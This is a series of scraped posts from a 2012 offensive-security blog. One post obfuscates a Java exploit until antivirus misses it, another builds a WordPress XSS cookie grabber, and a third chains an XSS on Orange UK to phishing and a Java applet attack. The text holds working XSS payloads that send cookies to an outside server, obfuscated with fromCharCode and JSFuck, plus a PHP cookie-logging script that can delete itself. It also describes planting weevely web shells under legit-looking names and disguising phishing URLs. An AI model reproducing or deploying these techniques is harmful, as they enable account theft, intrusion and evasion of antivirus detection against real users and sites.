From <a href="http://stackoverflow.com/questions/37628/what-is-reflection-and-why-is-it-useful">Stackoverflow</a>:<br />
<blockquote class="tr_bq">
The name reflection is used to describe code which is able to inspect other code in the same system (or itself).<br />
For example, say you have an object of an unknown type in Java, and you would like to call a 'doSomething' method on it if one exists. Java's static typing system isn't really designed to support this unless the object conforms to a known interface, but using reflection, your code can look at the object and find out if it has a method called 'doSomething', and then, call it if you want to.</blockquote>
Using java documentation from <a href="http://docs.oracle.com/javase/tutorial/reflect/member/ctorInstance.html">here</a> and <a href="http://docs.oracle.com/javase/tutorial/reflect/member/methodInvocation.html">there</a>, we instantiate a class and call two methods with reflection.<br />
<br />
Before:<br />
<pre class="brush: java">Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
stat.execute();</pre>
<br />
After:<br />
<pre class="brush: java">Class statClass = GimmeClass("java.beans.Statement");
Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
Object stat = con.newInstance(GimmeClass("java.lang.System"),secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
Method m = stat.getClass().getMethod("execute");
m.invoke(stat);</pre>
<br />
First we check if the exploit works, to see if we messed up something, but no it works. Ok, now upload to virustotal and should be a nice 0/44 detection..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Pu4vcFndwHA/UJQNt72sqwI/AAAAAAAAAV4/vUbDpvTP7MA/s1600/av_1_44_microsoft.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Pu4vcFndwHA/UJQNt72sqwI/AAAAAAAAAV4/vUbDpvTP7MA/s1600/av_1_44_microsoft.jpg" /></a></div>
<br />
<br />
Virustotal link <a href="https://www.virustotal.com/file/7c0af034c7a4a0dc8f1852737aca5eea8166c339a0562f453cbc046032aacac7/analysis/1351538626/">here</a>.<br />
Full image <a href="http://4.bp.blogspot.com/-ZKzvwAYcBzY/UKK4g1jL4sI/AAAAAAAAAYw/pC5BNvcNuc4/s1600/1-44.png">here</a>.<br />
Code <a href="http://pastebin.com/b3hfYD8x">here</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Damn we were so close. One antivirus detect our exploit. Guess who is back ?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-q0B02HRpPQ0/UJAo_hHQc8I/AAAAAAAAASo/776J9hZgh5U/s1600/microsoft-security-essentials.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="http://2.bp.blogspot.com/-q0B02HRpPQ0/UJAo_hHQc8I/AAAAAAAAASo/776J9hZgh5U/s320/microsoft-security-essentials.jpg" width="320" /></a></div>
<br />
Since it is the last to detect our exploit Microsoft Security Essentials is the winner of this small competition. This post can't end here because we want to made our exploit fully undetectable. Take a look at these two lines below.<br />
<br />
<pre class="brush: java">Permissions pe = new Permissions();
pe.add(new AllPermission());
</pre>
<br />
Why not use reflection. Then become:<br />
<br />
<pre class="brush: java">Class alPerm = Class.forName("java.security.AllPermission");
Class perm = GimmeClass("java.security.Permissions");
Object pe= perm.newInstance();
Method method = pe.getClass().getMethod("add", GimmeClass("java.security.Permission"));
method.invoke(pe, alPerm.newInstance());
</pre>
<br />
Once uploaded to virustotal detection ratio is ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kdIbxPH5wxw/UJQPRWueEsI/AAAAAAAAAWA/MxH6afmCv7o/s1600/av_0_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kdIbxPH5wxw/UJQPRWueEsI/AAAAAAAAAWA/MxH6afmCv7o/s1600/av_0_44.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Virustotal Link <a href="https://www.virustotal.com/file/c430160c0c513163a9d0cc9ab37f63441608921fad1e71af2f13ead060c3a6b9/analysis/1351543728/">here</a>.<br />
Full image <a href="http://3.bp.blogspot.com/-rWQOXW9yPy8/UKK41xvqXrI/AAAAAAAAAY4/YZhgcxi6rm0/s1600/0-44.png">here</a>.<br />
Code <a href="http://pastebin.com/DbsaQTDw">here</a>.<br />
<br />
Great! If we create a jar file it will be detected ?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3DmEHpAQknw/UJbTp9CycWI/AAAAAAAAAWY/wQCxle618Wc/s1600/av_00_jar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-3DmEHpAQknw/UJbTp9CycWI/AAAAAAAAAWY/wQCxle618Wc/s1600/av_00_jar.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/0861c3511f7540779a370559e869796ab9dbab3ffb9b30b9d58d0a7d5c10b1a8/analysis/1352061632/">here</a>.<br />
<br />
As class file it is not detected.<br />
<br />
Now we can test it on a windows machine with security essentials installed to see if really works. To do this test i used Windows 8 which has windows defender (security essentilas) installed by default.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-THtpvyuKZUI/UI7w_Ck5gWI/AAAAAAAAASI/QdltgMov4e0/s1600/win8_bypass_windef.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="http://3.bp.blogspot.com/-THtpvyuKZUI/UI7w_Ck5gWI/AAAAAAAAASI/QdltgMov4e0/s640/win8_bypass_windef.jpg" width="640" /></a></div>
<br />
It works!. I now this can't proof anything (it's just a picture) but soon i will post a video about this. You can find the video <a href="http://security-obscurity.blogspot.com/2012/12/attacking-windows-8-with-java-exploit.html">here</a>.<br />
<br />
Hope you enjoyed.<br />
<br />
Step by step java exploit code: <a href="http://pastebin.com/63GQx6Fx">1/5</a>, <a href="http://pastebin.com/RRssd4wk">2/5</a>, <a href="http://pastebin.com/cdD7FU2m">3/5</a>, <a href="http://pastebin.com/b3hfYD8x">4/5</a>, <a href="http://pastebin.com/DbsaQTDw">5/5</a>.<br />
<br />
References.<br />
- <a href="http://docs.oracle.com/javase/tutorial/reflect/member/ctorInstance.html">Creating new class instances</a><br />
- <a href="http://docs.oracle.com/javase/tutorial/reflect/member/methodInvocation.html">Invoking methods</a><br />
- <a href="http://stackoverflow.com/questions/95419/what-are-all-the-different-ways-to-create-an-object-in-java">What are all the different ways to create an object in Java?</a><br />
- <a href="http://stackoverflow.com/questions/160970/how-do-i-invoke-a-java-method-when-given-the-method-name-as-a-string">How do I invoke a java method when given the method name as a string?</a>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com22tag:blogger.com,1999:blog-3423828846307461333.post-15297578002429414722012-11-02T12:05:00.005+01:002012-11-02T14:56:00.328+01:00Wordpress Cookie GrabberIn a previous video <a href="http://www.youtube.com/watch?v=BXmXEKfxZQc">Wordpress XSS + Internet Explorer 8 Exploit</a> i showed you how you can use a Cross-site scripting vulnerability to redirect a victim with Internet Explorer to a malicious site containing an exploit for version 8. Another way, is to use it as cookie grabber.<br />
<br />
From wikipedia:<br />
<blockquote class="tr_bq">
<span style="font-family: sans-serif;"><span style="line-height: 19.200000762939453px;"><i>A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored in a user's web browser while a user is browsing a website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify the website of the user's previous activity.</i></span></span></blockquote>
Basically, when a user visit the "infected" page all cookies of that domain will be sent to a script which will store informations in a file/db or sent via email to the attacker.<br />
<br />
After selecting our wordpress target (franksite.dot/wordpress) we use a vulnerability scanner called <b>wpscan</b> developed by <a href="https://twitter.com/ethicalhack3r">ethicalhack3r</a> that is able to gather useful information such as:<br />
<ul>
<li>wordpress version</li>
<li>wordpress vulnerabilities (link to exploit-db)</li>
<li>all installed plugins</li>
<li>plugins vulnerabilities (link to exploit-db)</li>
</ul>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DUXplcBeL1c/UHlXLI3cwEI/AAAAAAAAAQ4/V1oL6aPV-yY/s1600/wpscan_wordpress_grabber.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-DUXplcBeL1c/UHlXLI3cwEI/AAAAAAAAAQ4/V1oL6aPV-yY/s1600/wpscan_wordpress_grabber.jpg" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
As we can see, there is a plugin installed called <a href="http://wordpress.org/extend/plugins/count-per-day/">Count per Day</a> which seems to be vulnerable. Results on exploit-db lead to two vulnerabilities for two different versions, therefore first we have to check which version is installed. As many plugins do, inside their folder there is a file with current version, changelog etc.. This plugin isn't different so since its folder is publicly accessible, you can see all files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-tUe_cG2ygIY/UHM3CQvHlMI/AAAAAAAAAQE/2VoWhdtAkGI/s1600/counterperday_folder_content.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="387" src="http://3.bp.blogspot.com/-tUe_cG2ygIY/UHM3CQvHlMI/AAAAAAAAAQE/2VoWhdtAkGI/s640/counterperday_folder_content.jpg" width="640" /></a></div>
<br />
After opening readme.txt and see that the current version is 3.2.3 we can focus on the previous exploit found in exploit-db. This version is vulnerable to a <a href="http://www.exploit-db.com/exploits/20862/">stored XSS</a>.<br />
<br />
How this vulnerability works. As you can see from the picture below there is a file notes.php which allow everyone to add some notes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--e5y9OVDZn8/UHrt984GN-I/AAAAAAAAARY/SvCWnPYs31g/s1600/wp_clean_notes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/--e5y9OVDZn8/UHrt984GN-I/AAAAAAAAARY/SvCWnPYs31g/s1600/wp_clean_notes.jpg" /></a></div>
<br />
This note can be plain text or html.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-nR7f_c6PceQ/UJOfu7DustI/AAAAAAAAAT4/GgWSZYeaK-4/s1600/cpd_html_code.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nR7f_c6PceQ/UJOfu7DustI/AAAAAAAAAT4/GgWSZYeaK-4/s1600/cpd_html_code.jpg" /></a></div>
<br />
This code is viewed in count-per day dashboard and the developer didn't validate the input, but the main problem of this page is that shouldn't be accessible to everyone.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-crnrvKiJ3aE/UJOgt5gpGbI/AAAAAAAAAUA/k77YQv76nBo/s1600/cpd_dashboard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-crnrvKiJ3aE/UJOgt5gpGbI/AAAAAAAAAUA/k77YQv76nBo/s1600/cpd_dashboard.jpg" /></a></div>
<br />
This is a perfect scenario where we can use a cookie grabber, because the code is exeuted only in administrator panel.<br />
<br /></div>
<div>
How can we get admin cookie ? </div>
<div>
</div>
<div>
<br />
We need two things:</div>
<div>
<ol>
<li>Javascript code that get cookie through <b>document.cookie</b> and send it</li>
<li>A script (php, python, ruby ..) on another server that receive the information and stores it (file, mysql, send email...).</li>
</ol>
<div>
A lot of online examples use a redirection method to get the cookie, like this one:</div>
<div>
<pre class="brush: js">document.location = "http://scriptlocation.dot/script?c=" + document.cookie
</pre>
</div>
<div>
In this case, this is not acceptable because we want to do it in a stealthiest way. What we have to do is a GET request to a script, so how we can do it in javascript without redirection ?</div>
<div>
</div>
<div>
A clever way is to use the <a href="http://www.w3schools.com/jsref/dom_obj_image.asp">Image object</a> and its <b><a href="http://www.w3schools.com/jsref/prop_img_src.asp">src</a></b> property. Once done the code will look like this:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-qxWCEIdntDA/UG_v0gQmXLI/AAAAAAAAAPk/Fn1MRGQBwnA/s1600/xss_cookie_grabber.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qxWCEIdntDA/UG_v0gQmXLI/AAAAAAAAAPk/Fn1MRGQBwnA/s1600/xss_cookie_grabber.jpg" /></a></div>
If we add this code as note, nothing will happen because Count per Day perform a quotes escape.<br />
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-gTy_BYErcZ4/UG_xFIzdN2I/AAAAAAAAAPs/srxM5ZF3_6Y/s1600/xss_cookie_grabber_not_working.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-gTy_BYErcZ4/UG_xFIzdN2I/AAAAAAAAAPs/srxM5ZF3_6Y/s1600/xss_cookie_grabber_not_working.jpg" /></a></div>
<br />
Since only quotes are escaped we can bypass this filter in two ways:<br />
<ol>
<li>Convert url in unicode characters </li>
<li>Use alphanumeric javascript </li>
</ol>
<div>
Let's try both ways. In the first way we need an ASCII to Unicode convert, i found this site <a href="https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/">string-fromcharcode-encoder</a>. After conversion our code will look like this:<br />
<br />
<pre class="brush: js">new Image().src = String.fromCharCode(104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,46,51,47,102,111,108,100,101,114,47,103,114,97,98,98,101,114,46,112,104,112,63,99,61) + document.cookie;
</pre>
<br />
Now the code will be executed, because there aren't quotes. A negative thing about this is if the administrator check the source code of the page, he will see the string <b>document.cookie</b> and maybe he will suspect something.<br />
<br />
In the second way we transform javascript code into an equivalent sequence of () [] {} ! + characters. A guy named Patricio Palladino made it possible creating a tool availabe <a href="http://patriciopalladino.com/files/hieroglyphy/">here</a>. Now our cookie grabber will look like this:<br />
<pre class="brush: js">[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]](([]
-- snip --
</pre>
Following this way, we obfuscate all the code, but the length is a disadvantage for a stealthier code. As last thing we need to use javascript escape function, otherwise some cookie characters will be altered, for example instead of <b>%</b> we get <b>|</b>.<br />
<pre class="brush: js">new Image().src="http://192.168.2.3/folder/grabber.php?c=" + escape(document.cookie);</pre>
<br />
Till now we have explained how to get the cookie, now let's start talk about how to store our information. This task is very simple because with few lines of php we can store all incoming cookies in a text file.<br />
<br />
Script code:</div>
<br />
<pre class="brush: php">$file_name = "cookie.txt";
$suicide_key = "password";
if( isset($_GET['c']) )
{
$content = $_GET['c'];
$content = str_replace(" ", "", $content);
$lines = explode(";",$content);
$handle = fopen($file_name,'a');
fwrite($handle, "----- START\n\n");
foreach( $lines as $line )
fwrite($handle,$line."\n");
fwrite($handle,"\n----- END\n");
fclose($handle);
}
else if( isset($_GET['s']) )
{
if( strcmp( trim($_GET['s']), $suicide_key ) == 0)
{
unlink($file_name);
unlink(__FILE__);
}
} </pre>
This code is simple and doesn't need explanations, the only thing is that i also provided a suicide mode in case the attacker wants to delete both files.Once we got the administrator cookie we use <a href="https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/">Cookies Manager+</a> a plugin for Firefox that is able to add/remove cookies.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_r2zZl4kl48/UHrwErWUeyI/AAAAAAAAARg/-JLB72QvRsg/s1600/wp_add_cookie.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_r2zZl4kl48/UHrwErWUeyI/AAAAAAAAARg/-JLB72QvRsg/s1600/wp_add_cookie.jpg" /></a></div>
<br />
<br />
After adding our cookie reload the page and voilĂ ; administrator privileges acquired. Since cookie can change or Count per Day can be removed or updated we need to find a way to create a backdoor (stay persistent). It's here that weevely comes in handy:<br />
<blockquote class="tr_bq">
<i>Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.</i></blockquote>
Hopefully franksite.dot has installed a plugin to manage files, so as administrators we can upload weevely and connect to it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG44y_YUF1A/UHrw-S495xI/AAAAAAAAARo/IjSI6WBQbi0/s1600/wp_weevely_connection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hG44y_YUF1A/UHrw-S495xI/AAAAAAAAARo/IjSI6WBQbi0/s1600/wp_weevely_connection.jpg" /></a></div>
<br />
To be more stealthier we upload again weevely, but this time in another folder (wp-admin) and with a name that it looks like a legit wordpress file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N_ShYJuuoTo/UHrx3u72d0I/AAAAAAAAARw/6oqjezd53w0/s1600/wp_weevely_userfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-N_ShYJuuoTo/UHrx3u72d0I/AAAAAAAAARw/6oqjezd53w0/s1600/wp_weevely_userfile.jpg" /></a></div>
<br />
That's all for now. Enjoy the video.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/JrwlislvE1U" width="640"></iframe><br />
<br />
References:<br />
- <a href="http://www.offensive-security.com/offsec/sample-penetration-test-report/">Sample penetration test report</a><br />
- <a href="https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/">https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/</a><br />
- <a href="http://patriciopalladino.com/blog/2012/08/09/non-alphanumeric-javascript.html">Javascript alphanumeric obfuscator</a></div>
Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-63464609463515171602012-10-02T23:27:00.001+02:002012-10-02T23:28:32.278+02:00Google winning award email scamJust a quick post, because i've never seen this type of scam (using google as vector), but i think it's an old technique.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-nZJmopHPGQ8/UGtWe_deRNI/AAAAAAAAAO0/RUWdBU92eKs/s1600/google_scam_email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="http://4.bp.blogspot.com/-nZJmopHPGQ8/UGtWe_deRNI/AAAAAAAAAO0/RUWdBU92eKs/s640/google_scam_email.jpg" width="640" /></a></div>
<br />
I have won a cash price from google, but why gmail moved the email to spam section ? :(<br />
<br />
Attached pdf.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-v_86rLbNhiQ/UGtaDI_uNYI/AAAAAAAAAPM/yVkM6PSRM5Y/s1600/google_scam_pdf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-v_86rLbNhiQ/UGtaDI_uNYI/AAAAAAAAAPM/yVkM6PSRM5Y/s640/google_scam_pdf.jpg" width="528" /></a></div>
<br />
Graphics seems to be created with paint, because is horrible. If they have to convince people to send their credentials, at least make a better template.Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com5tag:blogger.com,1999:blog-3423828846307461333.post-71266002574542451352012-05-30T16:10:00.001+02:002012-09-16T22:56:36.024+02:00From XSS to NT AUTHORITYA lot of times i have seen Cross-site scripting vulnerabilities classified as low impact or not significant. Thus, this time i want to show you how an attacker can get administration privileges through a simple XSS.<br />
<br />
A couple of months ago i discovered an XSS vulnerability affecting the uk website of Orange <a href="http://www.orange.co.uk/">http://www.orange.co.uk</a>. I've emailed them a month ago (and two weeks ago) regarding this vulnerability, but i haven't received any response yet.<br />
<br />
From wikipedia:<br />
<blockquote class="tr_bq">
<i>Orange is the flagship brand of the France Telecom group for mobile, landline and Internet businesses, with 226 million customers as of December 2011 and, under the brand Orange Business Services, is one of the world.</i></blockquote>
<b>How i found this XSS ?</b><br />
<br />
When you read an article, for example this one <a href="http://web.orange.co.uk/article/news/obesity_levels_could_be_cut_with_20_fat_tax">obesity_levels_could_be_cut_with_20_fat_tax</a>, you can see the users comments at the bottom of the page. If a user want to leave a comment, he must log in via google, facebook etc.... Once logged, the website create a profile with all your statictis (recent comments) and personal information (age, gender, joined).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HaskSd5X5PI/T7VLB2_eDKI/AAAAAAAAAMg/vU16qwq6S7w/s1600/comments_list.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="http://1.bp.blogspot.com/-HaskSd5X5PI/T7VLB2_eDKI/AAAAAAAAAMg/vU16qwq6S7w/s640/comments_list.JPG" width="640" /></a></div>
<br />
If you click on the name of a user you will be redirected to his profile page like this below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-12PLJOAtJOQ/T7VK6Un2BVI/AAAAAAAAAMY/Ebu_3S_lTMM/s1600/orange_user_profile.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="458" src="http://3.bp.blogspot.com/-12PLJOAtJOQ/T7VK6Un2BVI/AAAAAAAAAMY/Ebu_3S_lTMM/s640/orange_user_profile.JPG" width="640" /></a></div>
<br />
If you take a look at the url you will see that it has three parameters:<br />
<ol>
<li>UID</li>
<li>plckUserId </li>
<li>plckPersonaPage </li>
</ol>
Let's start testing the first parameter. We type some special characters that are used to find potential XSS vulnerabilities like <b>)("><'/&\.</b><br />
<br />
hxxp://web.orange.co.uk/r/community/persona?UID=)("><'/&\<br />
<br />
Surprisingly we get this<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RgjU5w_9sII/T7VOoiskN2I/AAAAAAAAAMs/I7Wwqjrh8zk/s1600/orange_special_chars.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="http://1.bp.blogspot.com/-RgjU5w_9sII/T7VOoiskN2I/AAAAAAAAAMs/I7Wwqjrh8zk/s640/orange_special_chars.JPG" width="640" /></a></div>
<br />
Oh... we are lucky; at the first attempt we have obtained something interesting. Let's try with a bit of html code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--7ZFrM3fidw/T7VPum_EwjI/AAAAAAAAAM0/lr0PIgQ0BPU/s1600/orange_h1_tag.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="http://4.bp.blogspot.com/--7ZFrM3fidw/T7VPum_EwjI/AAAAAAAAAM0/lr0PIgQ0BPU/s640/orange_h1_tag.JPG" width="640" /></a></div>
<br />
As expected the page didn't sanitize the output interpreting the html code. Using firebug we can see in which part of the page is located the faulty parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-fh9CktWXxcE/T7Vm6qeGLsI/AAAAAAAAANI/Xh9JEALyDC0/s1600/orange_firebug.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-fh9CktWXxcE/T7Vm6qeGLsI/AAAAAAAAANI/Xh9JEALyDC0/s1600/orange_firebug.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Now we sobstitute the h1 tag with a script tag (<script>alert(0)</script>) and we should get an alert box.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-o16NAY3YOIM/T78ukYjrpwI/AAAAAAAAANY/z5FTVMrg0ks/s1600/orange_script_tag.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="http://1.bp.blogspot.com/-o16NAY3YOIM/T78ukYjrpwI/AAAAAAAAANY/z5FTVMrg0ks/s640/orange_script_tag.JPG" width="640" /></a></div>
<br />
Is not so, let's take a look at the source code.<br />
<br />
<a href="http://1.bp.blogspot.com/-1eC-cKealHU/T78v94WlSqI/AAAAAAAAANo/O0znlqur7yk/s1600/orange_xss_filter.JPG" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://1.bp.blogspot.com/-1eC-cKealHU/T78v94WlSqI/AAAAAAAAANo/O0znlqur7yk/s1600/orange_xss_filter.JPG" /></a><br />
<br />
Seems there is an XSS filters with some blacklist tags. There are tons of others ways to trigger an XSS without a script tag, one of them is using the img tag.<br />
<br />
<img/src="1"/onerror="alert(1)"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-tRP_hUgLEQc/T7-AWbWsycI/AAAAAAAAAN0/kMahQ6XOFEw/s1600/orange_img_xss.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-tRP_hUgLEQc/T7-AWbWsycI/AAAAAAAAAN0/kMahQ6XOFEw/s640/orange_img_xss.JPG" width="640" /></a></div>
<br />
Since 1 isn't a valid image the onerror event is triggered and his content executed. Now all we have to do is sobstitute the alert instruction with some useful code.<br />
<br />
In our case we want to redirect the victim to a cloned page containing a malicious java applet, so the code will be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ry7S6oEQVgU/T8XgJs9wRaI/AAAAAAAAAOM/aS5IrHpOV34/s1600/orange_xss_code.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="http://4.bp.blogspot.com/-ry7S6oEQVgU/T8XgJs9wRaI/AAAAAAAAAOM/aS5IrHpOV34/s640/orange_xss_code.JPG" width="640" /></a></div>
<br />
<br />
<b>How can we trick the victim to click our malicious link ?</b><br />
<br />
Simple, we can send him an email regarding some promotions that orange actually do and telling to click on the image.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-OnfAWBohsLI/T8SAaugKHaI/AAAAAAAAAOA/ndTYd4LnBQ4/s1600/orange_email_template.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://4.bp.blogspot.com/-OnfAWBohsLI/T8SAaugKHaI/AAAAAAAAAOA/ndTYd4LnBQ4/s400/orange_email_template.JPG" width="400" /></a></div>
<br />
But here we have a little problem.<br />
<br />
When you place the mouse over the image in most of the browsers at the bottom will appear the link pointed by the image. Some users can be suspicious viewing a link like this hxxp://web.orange.co.uk/r/community/persona?UID="><img/src="1"/onerror="window.location='...'", so disguise the url is a necessary step.<br />
<br />
To accomplish this task we do two things:<br />
<br />
<ol>
<li>Add unexisting url parameters ( page=1&category=2&ticket=24234&session_id=888 )</li>
<li>XSS character encoding ( <b>UID="><img</b> ... to <b>%55%49%44=%22%3E%3C%69%6D%67</b>.... )</li>
</ol>
<br />
And the result is this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-TU8zHDB-ksM/T8YnLPx0ucI/AAAAAAAAAOY/JM2g-wH1R9w/s1600/orange_url_covered.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="http://3.bp.blogspot.com/-TU8zHDB-ksM/T8YnLPx0ucI/AAAAAAAAAOY/JM2g-wH1R9w/s640/orange_url_covered.JPG" width="640" /></a></div>
<br />
To compromise victim's machine we use a great feature from SET called Java Applet Attack Vector.<br />
<br />
From <a href="http://www.social-engineer.org/">http://www.social-engineer.org</a>:<br />
<blockquote class="tr_bq">
<i>The Java Applet is one of the core attack vectors within SET and the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.</i></blockquote>
I've cloned this page <a href="http://web.orange.co.uk/p/film/cinema_tickets">hxxp://web.orange.co.uk/p/film/cinema_tickets</a> and sent the email with a address that a lot of companies uses when they send promotions and things like that (donotreply@...).<br />
<br />
That's all, enjoy the video.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/x5DxA3w6bmM" width="640"></iframe>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com12tag:blogger.com,1999:blog-3423828846307461333.post-56638415660440349982012-04-23T13:13:00.000+02:002012-04-25T16:26:50.728+02:00CartaSi phishing email part 2/2Behind this phishing emails there are several people or just one guy ?<br />
<br />
What i think is that there is only one guy because if you check the title of this script you see the write <b>assembled by ME,</b> if it was a team should be written Assembled by XYZ team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-t2nvyn2CPjY/T4hGVJ1v6gI/AAAAAAAAAIU/0n9STwpcLSQ/s1600/assembled_by_me.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-t2nvyn2CPjY/T4hGVJ1v6gI/AAAAAAAAAIU/0n9STwpcLSQ/s400/assembled_by_me.JPG" width="369" /></a></div>
<br />
Where is he from ?<br />
<br />
